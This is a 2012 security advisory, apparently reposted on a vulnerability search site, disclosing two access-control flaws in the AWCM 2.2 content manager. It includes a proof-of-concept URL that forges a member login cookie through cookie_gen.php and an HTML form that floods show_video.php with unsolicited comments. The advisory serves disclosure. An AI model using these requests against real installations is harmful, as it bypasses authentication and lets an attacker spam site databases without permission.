Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2012-2437 CVE-2012-2438

Publish Date: 08 Nov 2012

Source

                							

                Vulnerability Report AWCM 2.2

CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438
Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts
DB records.
Author: Sooel Son [sonpostman (at) gmail (dot) com]
Source Code: http://sourceforge.net/projects/awcm/

1. Details: CVE-2012-2437
        Without going through an authentication procedure, anyone can
forge a cookie, the
pairs of key and value.

        Proof of Concept Code: Initiate the following URL request.
        http://targethost/awcm/cookie_gen.php?name=\'key\'&amp;content=\'value\'
        ex) http://targethost/awcm/cookie_gen.php?
name=awcm_member&amp;content=123456

2. Details CVE-2012-2438
        There is no access control protection for adversaries to
insert millions of
        comment records on the database on show_video.php and topic.php.

        Proof of Concept Code:
        [form action=\"http://targethost/awcm/show_video.php?coment=exploit\"
        method=\"post\"]
          [input type=\"hidden\" name=\"coment\" value=\'insert
uninvited comments 2\' /]
          [input type=\"submit\" value=\"Submit\"]
        &lt;/form&gt;

##########################
Vendor Notification
* Nov 5th: Acknowledge the vendors, but no responses.
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

AWCM 2.2 Access Bypass

Vulmon Search

About

Products

Connect